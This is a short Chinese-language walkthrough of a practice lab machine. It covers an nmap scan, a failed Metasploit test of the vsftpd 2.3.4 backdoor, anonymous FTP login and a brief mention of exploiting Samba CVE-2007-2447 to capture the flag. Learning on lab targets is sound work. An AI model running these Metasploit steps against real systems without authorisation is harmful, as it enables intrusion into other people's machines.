小白渗透的第一步
扫描端口
nmap -Pn -sC -sV -vvv 10.10.10.3
大概就是这样,单看结果,会发现这里面有太多可以用的信息,包括FTP的匿名登陆,或者说是vsftpd 2.3.4的后门等等
分析FTP
在这个靶机里,ftp不仅可以使用Anonymous直接登录,还包含了一个非常明显的后门漏洞,
我们可以使用Metasploit直接测试一下,
我们会发现无法复现它,这时我们可以尝试登录FTP看看有没有更多信息
结果就是ftp目前看来没啥利用价值了
msfconsole //打开Metasploit
search vsftpd 2.3.4 //根据以及得知的信息搜索对应的payload
use 0 //根据搜索结果使用payload
show options //查看所需参数,yes表明必须填写
set rhosts 10.10.10.3 //设置对于参数
run //运行
ftp Anonymous@10.10.10.3 //登录匿名ftp
分析Samba --CVE-2007-2447
根据nmap结果,我们可以得知靶机开了,139和445
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
结果发现对应Samba似乎存在着与vsftpd 2.3.4的笑脸漏洞一样经典的CVE-2007-2447,一样我们可以进行测试
至此,可以直接得到目标的flag
总结
这个就是简单的靶机,里面存在着很多经典的内容,建议大家刚开始学渗透的时候多去动手试试